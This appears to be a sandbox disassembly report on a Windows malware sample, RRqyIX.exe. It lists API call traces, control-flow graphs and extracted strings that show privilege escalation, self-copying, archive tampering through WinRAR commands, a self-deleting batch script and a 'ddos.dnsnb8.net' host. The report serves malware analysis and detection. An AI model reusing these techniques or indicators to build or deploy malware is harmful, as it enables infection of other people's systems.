              • Not Executed
              control_flow_graph 205 ae1000-ae1023 CreateFileA 206 ae1025-ae1055 GetFileSize CreateFileMappingA MapViewOfFile 205->206 207 ae1092-ae1096 205->207 208 ae107b-ae1085 206->208 209 ae1057-ae105f 206->209 212 ae108d-ae1091 CloseHandle 208->212 213 ae1087-ae108b CloseHandle 208->213 210 ae1074-ae1075 UnmapViewOfFile 209->210 211 ae1061-ae106e call ae17d0 209->211 210->208 211->210 212->207 213->212
              APIs
              • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,?,http://%s:%d/%s/%s,00AE10E8,?), ref: 00AE1018
              • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,76938400,?,http://%s:%d/%s/%s,00AE10E8,?), ref: 00AE1029
              • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00AE1038
              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,http://%s:%d/%s/%s,00AE10E8,?), ref: 00AE104B
              • UnmapViewOfFile.KERNEL32(00000000,?,http://%s:%d/%s/%s,00AE10E8,?), ref: 00AE1075
              • CloseHandle.KERNEL32(?,?,http://%s:%d/%s/%s,00AE10E8,?), ref: 00AE108B
              • CloseHandle.KERNEL32(00000000,?,http://%s:%d/%s/%s,00AE10E8,?), ref: 00AE108E
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd
              Similarity
              • API ID: File$CloseCreateHandleView$MappingSizeUnmap
              • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
              • API String ID: 1223616889-3273462101
              • Opcode ID: 440b7e1e5f7ee05ce8fba7b75d546d64da2c64899a23c922fc789b1f219dcb4d
              • Instruction ID: b8bc68bff389a1a0792074d3cdce193807fc4ef26d9c59ca5d5831514bb55f65
              • Opcode Fuzzy Hash: 440b7e1e5f7ee05ce8fba7b75d546d64da2c64899a23c922fc789b1f219dcb4d
              • Instruction Fuzzy Hash: 4D01487250039DBFE730AFA19CCCE2B7BACDB447A9F004529F645A7590D6705E458B60

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 375 ae2c48-ae2c75 memset call ae1973 378 ae2c77-ae2c7f 375->378 379 ae2cb2-ae2cb9 375->379 380 ae2c8f-ae2cac CreateThread WaitForMultipleObjects 378->380 381 ae2c81-ae2c8b 378->381 382 ae2cbb-ae2cc2 VirtualFree 379->382 383 ae2cc8-ae2ccc 379->383 380->379 381->380 382->383
              APIs
              • memset.MSVCRT ref: 00AE2C57
                • Part of subcall function 00AE1973: PathFileExistsA.SHLWAPI(00AE4E5C,00000000,C:\Users\user\AppData\Local\Temp\RRqyIX.exe), ref: 00AE1992
                • Part of subcall function 00AE1973: CreateFileA.KERNEL32(00AE4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00AE19BA
                • Part of subcall function 00AE1973: Sleep.KERNEL32(00000064), ref: 00AE19C6
                • Part of subcall function 00AE1973: wsprintfA.USER32 ref: 00AE19EC
                • Part of subcall function 00AE1973: CopyFileA.KERNEL32(00AE4E5C,?,00000000), ref: 00AE1A00
                • Part of subcall function 00AE1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AE1A1E
                • Part of subcall function 00AE1973: GetFileSize.KERNEL32(00AE4E5C,00000000), ref: 00AE1A2C
                • Part of subcall function 00AE1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00AE1A46
                • Part of subcall function 00AE1973: ReadFile.KERNEL32(00AE4E5C,00AE4E60,00000000,?,00000000), ref: 00AE1A65
              • CreateThread.KERNEL32(00000000,00000000,Function_00002B8C,00000000,00000000,00000000), ref: 00AE2C99
              • WaitForMultipleObjects.KERNEL32(00000001,00AE16BA,00000001,000000FF,?,00AE16BA,00000000), ref: 00AE2CAC
              • VirtualFree.KERNEL32(00C30000,00000000,00008000,C:\Users\user\AppData\Local\Temp\RRqyIX.exe,00AE4E5C,00AE4E60,?,00AE16BA,00000000), ref: 00AE2CC2
              Strings
              • C:\Users\user\AppData\Local\Temp\RRqyIX.exe, xrefs: 00AE2C69
              Memory Dump Source
              • Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd
              Similarity
              • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
              • String ID: C:\Users\user\AppData\Local\Temp\RRqyIX.exe
              • API String ID: 2042498389-1698010288
              • Opcode ID: a7c192d79cdbb719f2ce583fbd838037592ba5274dca13c0a7f528fb8e5bb7fe
              • Instruction ID: aa930a364c904a30a3ce9088dc5f09fde5d70020b2aa5010e8ba6dd559773aab
              • Opcode Fuzzy Hash: a7c192d79cdbb719f2ce583fbd838037592ba5274dca13c0a7f528fb8e5bb7fe
              • Instruction Fuzzy Hash: EB017C726412A47AE614EBE6DC4EFEB7EADEF45B60F104520F5059A1C1D6A09A00C7A0

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 384 ae14e1-ae14fb 385 ae14fd-ae1510 GetModuleHandleA 384->385 386 ae1541-ae1547 384->386 389 ae151a-ae1535 VirtualQuery 385->389 390 ae1512-ae1518 385->390 387 ae1549-ae154c 386->387 388 ae1573-ae1574 call ae1638 386->388 393 ae154e-ae1555 387->393 394 ae1569-ae1570 387->394 397 ae1579-ae157a ExitProcess 388->397 391 ae153b 389->391 392 ae1537-ae1539 389->392 390->386 391->386 392->386 392->391 393->394 396 ae1557-ae1566 call ae1af9 393->396 396->394
              APIs
              • GetModuleHandleA.KERNEL32(00000000), ref: 00AE1504
              • VirtualQuery.KERNEL32(00AE14E1,?,0000001C), ref: 00AE1525
              • ExitProcess.KERNEL32 ref: 00AE157A
              Memory Dump Source
              • Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd
              Similarity
              • API ID: ExitHandleModuleProcessQueryVirtual
              • String ID:
              • API String ID: 3946701194-0
              • Opcode ID: 181df8f21ab1c05aaaf385865b9e21d8bfeee2bc93cd4821d1226c6f32fe16f5
              • Instruction ID: 86239b4bcaa2d20425405ec2dcaffdbe64c82edd67673fef06f44e91526fb627
              • Opcode Fuzzy Hash: 181df8f21ab1c05aaaf385865b9e21d8bfeee2bc93cd4821d1226c6f32fe16f5
              • Instruction Fuzzy Hash: 89113CB1E412A4EFCB21DFE6ACC5A7D77BCEB8C751B10402AF403DB150D27489429B61

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 400 ae1915-ae1922 401 ae1928-ae192c 400->401 402 ae1924-ae1926 400->402 404 ae192e-ae194d memset GetFileTime 401->404 405 ae194f-ae1952 401->405 403 ae196e-ae1970 402->403 406 ae1966-ae1968 404->406 405->403 407 ae1954-ae1960 SetFileTime 405->407 408 ae196c 406->408 409 ae196a 406->409 407->406 408->403 409->408
              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd
              Similarity
              • API ID: FileTimememset
              • String ID:
              • API String ID: 176422537-0
              • Opcode ID: af4146d0dcc7b22bdfc43876e37825728594ed9390a3afd9e8106ccbebbac7ed
              • Instruction ID: 3b669ee32fc7d7cbc85f43d5e9523e05cf935ca3fea47c8b6f21620f1b0bbe59
              • Opcode Fuzzy Hash: af4146d0dcc7b22bdfc43876e37825728594ed9390a3afd9e8106ccbebbac7ed
              • Instruction Fuzzy Hash: 65F06232200259ABDB20DF67DC44BEB77ACAB50361F50853AF526D6091E770E645CBB0

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 410 ae6159-ae6189 VirtualFree 411 ae618c-ae6192 410->411 412 ae6198-ae61b0 VirtualFree 411->412 413 ae60c7-ae60cf 411->413 415 ae61ba-ae61c8 412->415 416 ae61b2-ae61b4 412->416 413->411 414 ae60d5-ae60f8 VirtualAlloc 413->414 436 ae60fe-ae6106 414->436 437 ae60fa-ae60fc call ae66c8 414->437 418 ae61ca-ae61d7 415->418 419 ae6243-ae6251 415->419 416->415 420 ae61dd-ae61e0 418->420 422 ae6264-ae626f 419->422 423 ae6253 419->423 420->419 425 ae61e2-ae61f2 420->425 424 ae6271-ae6276 422->424 427 ae6255-ae6258 423->427 428 ae627c-ae6289 424->428 429 ae6389-ae63b1 VirtualProtect 424->429 430 ae61f5-ae61fe 425->430 427->422 432 ae625a-ae6262 427->432 448 ae628b 428->448 449 ae6292-ae6298 428->449 435 ae63b7-ae63ba 429->435 433 ae620c-ae6219 430->433 434 ae6200-ae6203 430->434 432->427 441 ae6238-ae623f 433->441 439 ae621b-ae6228 434->439 440 ae6205-ae6208 434->440 442 ae63fc-ae63ff VirtualProtect 435->442 443 ae63bc-ae63c2 435->443 445 ae6108-ae611d 436->445 446 ae6155-ae6189 VirtualFree 436->446 437->436 439->441 450 ae622a-ae6236 440->450 451 ae620a 440->451 441->430 453 ae6241 441->453 447 ae6400-ae6416 442->447 443->443 452 ae63c4 443->452 455 ae611f-ae6121 445->455 446->411 458 ae6418-ae641d 447->458 459 ae6420-ae6425 447->459 448->449 460 ae62a2-ae62ac 449->460 450->441 451->441 452->442 461 ae63c6-ae63cf 452->461 453->420 456 ae6123 455->456 457 ae6151-ae6154 455->457 456->457 462 ae6125-ae6128 456->462 457->446 463 ae62ae 460->463 464 ae62b1-ae62c8 460->464 465 ae63d4-ae63d8 461->465 466 ae63d1 461->466 467 ae612a-ae612e 462->467 468 ae6134-ae613b 462->468 463->464 469 ae62ce-ae62d4 464->469 470 ae6373-ae6384 464->470 471 ae63dd-ae63e1 465->471 472 ae63da 465->472 466->465 467->468 479 ae6130-ae6132 467->479 468->479 480 ae613d-ae614f 468->480 475 ae62da-ae62f1 469->475 476 ae62d6-ae62d9 469->476 470->424 477 ae63e7-ae63fa VirtualProtect 471->477 478 ae63e3 471->478 472->471 482 ae6365-ae636e 475->482 483 ae62f3-ae62f9 475->483 476->475 477->435 477->442 478->477 479->455 480->455 482->460 484 ae62fb-ae630f 483->484 485 ae6314-ae6326 483->485 486 ae6426-ae64a9 484->486 487 ae634c-ae6360 485->487 488 ae6328-ae634a 485->488 497 ae64ab-ae64c0 486->497 498 ae6519-ae651c 486->498 487->486 488->482 504 ae6535-ae6537 497->504 505 ae64c2 497->505 499 ae651d-ae651e 498->499 500 ae6583-ae6587 498->500 503 ae6522-ae6533 499->503 502 ae6588-ae658b 500->502 506 ae658d-ae658f 502->506 507 ae65a1-ae65a3 502->507 503->504 508 ae659a 504->508 509 ae6539 504->509 510 ae64f8 505->510 511 ae64c5-ae64cd 505->511 512 ae6591-ae6593 506->512 515 ae659b-ae659d 508->515 513 ae653b-ae6541 509->513 514 ae65b4 509->514 518 ae656c-ae656f 510->518 519 ae64fa-ae64fe 510->519 516 ae64cf-ae64d4 511->516 517 ae6542-ae6545 511->517 512->515 520 ae6595 512->520 513->517 525 ae65be-ae6608 514->525 515->512 521 ae659f 515->521 522 ae64d6-ae64d9 516->522 523 ae6517-ae6518 516->523 524 ae654d-ae6550 517->524 526 ae6572 518->526 519->526 527 ae6500 519->527 520->508 521->502 522->524 529 ae64db-ae64f5 522->529 523->498 524->525 530 ae6552-ae6556 524->530 531 ae6573-ae6576 526->531 527->503 532 ae6502 527->532 529->510 533 ae6578-ae657f 530->533 534 ae6558-ae6569 530->534 531->533 532->531 535 ae6504-ae6513 532->535 533->500 534->518 535->504 537 ae6515 535->537 537->523
              APIs
              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00AE60DF
              • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00AE6189
              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00AE61A5
              Memory Dump Source
              • Source File: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd
              Similarity
              • API ID: Virtual$Free$Alloc
              • String ID:
              • API String ID: 1852963964-0
              • Opcode ID: bb24bd534f81e4389fe96f4ee43071a241772b8d06ea67700a2d036d8fe43670
              • Instruction ID: 122d628f706ab1884ea950d04eb0c7f9988270324b2f2bb83822906723553b0b
              • Opcode Fuzzy Hash: bb24bd534f81e4389fe96f4ee43071a241772b8d06ea67700a2d036d8fe43670
              • Instruction Fuzzy Hash: E211BC32A00689CFCF328F59CC813DD37A1FF21340F694928DE896F292DA712940CB94
              APIs
              • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\RRqyIX.exe,?,?,?,?,?,?,00AE13EF), ref: 00AE11AB
              • OpenProcessToken.ADVAPI32(00000000,00000028,00AE13EF,?,?,?,?,?,?,00AE13EF), ref: 00AE11BB
              • AdjustTokenPrivileges.ADVAPI32(00AE13EF,00000000,?,00000010,00000000,00000000), ref: 00AE11EB
              • CloseHandle.KERNEL32(00AE13EF), ref: 00AE11FA
              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00AE13EF), ref: 00AE1203
              Strings
              • C:\Users\user\AppData\Local\Temp\RRqyIX.exe, xrefs: 00AE11A5
              Memory Dump Source
              • Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd
              Similarity
              • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
              • String ID: C:\Users\user\AppData\Local\Temp\RRqyIX.exe
              • API String ID: 75692138-1698010288
              • Opcode ID: bde308b0d99d67afc4191389d2b4cba85fea5f998209a833a085a05fb0d89ebd
              • Instruction ID: 9cad48e8aa76240045cb20aea485349551f7b28194bb2fd2b8f066cbffd43ec2
              • Opcode Fuzzy Hash: bde308b0d99d67afc4191389d2b4cba85fea5f998209a833a085a05fb0d89ebd
              • Instruction Fuzzy Hash: AA0124B2900248FFDF10EFE4DD89AAEBBB9FB08304F104469E606A6250D7709F459F50
              APIs
              • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\RRqyIX.exe), ref: 00AE13BC
              • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00AE13DA
              • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00AE1448
                • Part of subcall function 00AE119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\RRqyIX.exe,?,?,?,?,?,?,00AE13EF), ref: 00AE11AB
                • Part of subcall function 00AE119F: OpenProcessToken.ADVAPI32(00000000,00000028,00AE13EF,?,?,?,?,?,?,00AE13EF), ref: 00AE11BB
                • Part of subcall function 00AE119F: AdjustTokenPrivileges.ADVAPI32(00AE13EF,00000000,?,00000010,00000000,00000000), ref: 00AE11EB
                • Part of subcall function 00AE119F: CloseHandle.KERNEL32(00AE13EF), ref: 00AE11FA
                • Part of subcall function 00AE119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,00AE13EF), ref: 00AE1203
              Strings
              • SeDebugPrivilege, xrefs: 00AE13D3
              • C:\Users\user\AppData\Local\Temp\RRqyIX.exe, xrefs: 00AE13A8
              Memory Dump Source
              • Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd
              Similarity
              • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
              • String ID: C:\Users\user\AppData\Local\Temp\RRqyIX.exe$SeDebugPrivilege
              • API String ID: 4123949106-3465637096
              • Opcode ID: 2390801fe337746c2056dc0be24c8976ef1a5fa312fb252ff2068342db0542cd
              • Instruction ID: 777525df9108785b0979755bb5c42abe5c000b0e52fc4592d77e7beb6740b0f7
              • Opcode Fuzzy Hash: 2390801fe337746c2056dc0be24c8976ef1a5fa312fb252ff2068342db0542cd
              • Instruction Fuzzy Hash: B03183B1E002AAEADF60DBA7CD45FEEBBB8EB44704F104569E505B7281D7309E45CB60
              APIs
              • strstr.MSVCRT ref: 00AE23CC
              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00AE2464
              • GetFileSize.KERNEL32(00000000,00000000), ref: 00AE2472
              • CloseHandle.KERNEL32(?,00000000,00000000), ref: 00AE24A8
              • memset.MSVCRT ref: 00AE24B9
              • strrchr.MSVCRT ref: 00AE24C9
              • wsprintfA.USER32 ref: 00AE24DE
              • strrchr.MSVCRT ref: 00AE24ED
              • memset.MSVCRT ref: 00AE24F2
              • memset.MSVCRT ref: 00AE2505
              • wsprintfA.USER32 ref: 00AE2524
              • Sleep.KERNEL32(000007D0), ref: 00AE2535
              • Sleep.KERNEL32(000007D0), ref: 00AE255D
              • memset.MSVCRT ref: 00AE256E
              • wsprintfA.USER32 ref: 00AE2585
              • memset.MSVCRT ref: 00AE25A6
              • wsprintfA.USER32 ref: 00AE25CA
              • Sleep.KERNEL32(000007D0), ref: 00AE25D0
              • Sleep.KERNEL32(000007D0,?,?), ref: 00AE25E5
              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00AE25FC
              • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00AE2611
              • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00AE2642
              • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 00AE265B
              • SetEndOfFile.KERNEL32 ref: 00AE266D
              • CloseHandle.KERNEL32(00000000), ref: 00AE2676
              • RemoveDirectoryA.KERNEL32(?), ref: 00AE2681
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd
              Similarity
              • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
              • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
              • API String ID: 2203340711-774930870
              • Opcode ID: 6880a7e863da7c18298e83242900259c6d3eba6fc570be3d5ce9fef2f0adb11d
              • Instruction ID: a230f92bcc40d0dc82da44ce9fd80a35ce863a0ec084d34707058f349f054369
              • Opcode Fuzzy Hash: 6880a7e863da7c18298e83242900259c6d3eba6fc570be3d5ce9fef2f0adb11d
              • Instruction Fuzzy Hash: 8581A1B2504384BBDB10DFA2DC89FAB77EDFB88704F00091AF684D7190D7749A498B66
              APIs
              • memset.MSVCRT ref: 00AE2766
              • memset.MSVCRT ref: 00AE2774
              • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00AE2787
              • wsprintfA.USER32 ref: 00AE27AB
                • Part of subcall function 00AE185B: GetSystemTimeAsFileTime.KERNEL32(00AE1F92,00000000,?,00000000,?,?,?,00AE1F92,?,00000000,00000002), ref: 00AE1867
                • Part of subcall function 00AE185B: srand.MSVCRT ref: 00AE1878
                • Part of subcall function 00AE185B: rand.MSVCRT ref: 00AE1880
                • Part of subcall function 00AE185B: srand.MSVCRT ref: 00AE1890
                • Part of subcall function 00AE185B: rand.MSVCRT ref: 00AE1894
              • wsprintfA.USER32 ref: 00AE27C6
              • CopyFileA.KERNEL32(?,00AE4C80,00000000), ref: 00AE27D4
              • wsprintfA.USER32 ref: 00AE27F4
                • Part of subcall function 00AE1973: PathFileExistsA.SHLWAPI(00AE4E5C,00000000,C:\Users\user\AppData\Local\Temp\RRqyIX.exe), ref: 00AE1992
                • Part of subcall function 00AE1973: CreateFileA.KERNEL32(00AE4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00AE19BA
                • Part of subcall function 00AE1973: Sleep.KERNEL32(00000064), ref: 00AE19C6
                • Part of subcall function 00AE1973: wsprintfA.USER32 ref: 00AE19EC
                • Part of subcall function 00AE1973: CopyFileA.KERNEL32(00AE4E5C,?,00000000), ref: 00AE1A00
                • Part of subcall function 00AE1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AE1A1E
                • Part of subcall function 00AE1973: GetFileSize.KERNEL32(00AE4E5C,00000000), ref: 00AE1A2C
                • Part of subcall function 00AE1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00AE1A46
                • Part of subcall function 00AE1973: ReadFile.KERNEL32(00AE4E5C,00AE4E60,00000000,?,00000000), ref: 00AE1A65
              • DeleteFileA.KERNEL32(?,?,00AE4E54,00AE4E58), ref: 00AE281A
              • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00AE4E54,00AE4E58), ref: 00AE2832
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd
              Similarity
              • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
              • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
              • API String ID: 692489704-3099098879
              • Opcode ID: b7e72d4efab014c61f526f188b795d815b67572f03a3644eab07b205e91aa6f5
              • Instruction ID: 378f244a465c10ae2645185910d9e3c418814047f3a918a4f735558ca65c7e78
              • Opcode Fuzzy Hash: b7e72d4efab014c61f526f188b795d815b67572f03a3644eab07b205e91aa6f5
              • Instruction Fuzzy Hash: A621FCB7D402987BEB10E7A69D89FEB776CEB14754F0009A1B645E3042E6B49F448BA0
              APIs
                • Part of subcall function 00AE185B: GetSystemTimeAsFileTime.KERNEL32(00AE1F92,00000000,?,00000000,?,?,?,00AE1F92,?,00000000,00000002), ref: 00AE1867
                • Part of subcall function 00AE185B: srand.MSVCRT ref: 00AE1878
                • Part of subcall function 00AE185B: rand.MSVCRT ref: 00AE1880
                • Part of subcall function 00AE185B: srand.MSVCRT ref: 00AE1890
                • Part of subcall function 00AE185B: rand.MSVCRT ref: 00AE1894
              • wsprintfA.USER32 ref: 00AE15AA
              • wsprintfA.USER32 ref: 00AE15C6
              • lstrlen.KERNEL32(?), ref: 00AE15D2
              • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00AE15EE
              • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00AE1609
              • CloseHandle.KERNEL32(00000000), ref: 00AE1612
              • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00AE162D
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd
              Similarity
              • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
              • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\RRqyIX.exe$open
              • API String ID: 617340118-1889264406
              • Opcode ID: acc9b14e7d6fffe9dcde48ca9486975253c47c753164d91ea8aedb33f78fc3e4
              • Instruction ID: 58a6aa67b9bc404a7858cc5f0b692379ab5408d97af4875a4788d887ecabfe87
              • Opcode Fuzzy Hash: acc9b14e7d6fffe9dcde48ca9486975253c47c753164d91ea8aedb33f78fc3e4
              • Instruction Fuzzy Hash: 7E115173A011A8BADF20D7E59C8DDEB7B6CEF59760F000591F549E3040DA709B858BB0
              APIs
              • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00AE1400), ref: 00AE1226
              • GetProcAddress.KERNEL32(00000000), ref: 00AE122D
              • GetCurrentProcessId.KERNEL32(?,?,?,?,00AE1400), ref: 00AE123F
              • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00AE1400), ref: 00AE1250
              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\RRqyIX.exe,?,?,?,?,00AE1400), ref: 00AE129E
              • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\RRqyIX.exe,?,?,?,?,00AE1400), ref: 00AE12B0
